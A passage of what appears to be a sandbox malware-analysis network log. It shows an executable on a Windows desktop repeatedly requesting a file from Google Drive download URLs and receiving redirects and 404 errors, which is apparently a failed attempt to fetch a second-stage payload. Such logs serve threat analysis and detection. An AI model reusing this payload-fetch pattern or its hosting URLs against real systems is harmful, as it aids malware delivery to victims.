                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.9 | 49724 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:13 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:14 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRS1TvkPj5_KTp9_ekNxZGBr9ceCpw_vFb4MkfVElYg7yIUMj5qkMP_ZowhSgOMW2wL
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:14 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-vtonzqy3wwwa2PjxkLvEAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:14 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pzmCZuGk-D4yVyQbBEjpiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.9 | 49725 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:15 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:15 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ovvm97GCBj6V-K7uHLKwyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.9 | 49726 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:16 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:16 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRpiqGEPX-n2utksJGd34FgwjlnM9Cf46XbpI9kV312sUK5kBwMrd3OtJaDE6q8U5Zx
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:16 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-IHyfGK6NjM1477L0lhPOeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yHebbxa5PuMHMKrYlSW2Hw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.9 | 49727 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:17 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:17 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:17 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-RlIs1petJ8-5IbuWYb7Xsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.9 | 49728 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:18 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:19 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6CTaJF6li4qfG1Jbp1vyIYNwLQUabViIf8xxTdMd_8LUeI-936oOGOEbpTosc3n_HCB3wy9IM
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:18 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-DTbENDwtkkTkdYQxvy9cYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Yt6Mux6Kg6f6Hlb8fWgpsw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.9 | 49729 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:19 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:20 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:20 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-SpAxjgKjwdfT_VsaYdvEnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                19 | 192.168.2.9 | 49730 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:20 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:21 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQys0xdjd8d0iAhgMTYC5amCQIvmqi0DftZIdE3lSX3882aKe-U6n1dMcN5fCGKyPMi
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:21 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-wefIlMyrmVpfA3R0VLu4kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:21 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HFVnvmo8eVBHGV2sCPYjyg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                20 | 192.168.2.9 | 49731 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:22 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:22 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-gK3Cskc8kOx_u7ctUTAEjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                21 | 192.168.2.9 | 49732 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:23 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRDjHdwOpl_xT2NVQp5cBMnB3tDYaDrlxa5LRI03XB3bxUuElUQunq8YdEhhKxdJm4i
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:23 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-po9Sh3lnv_bhWJ3v8q_fuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
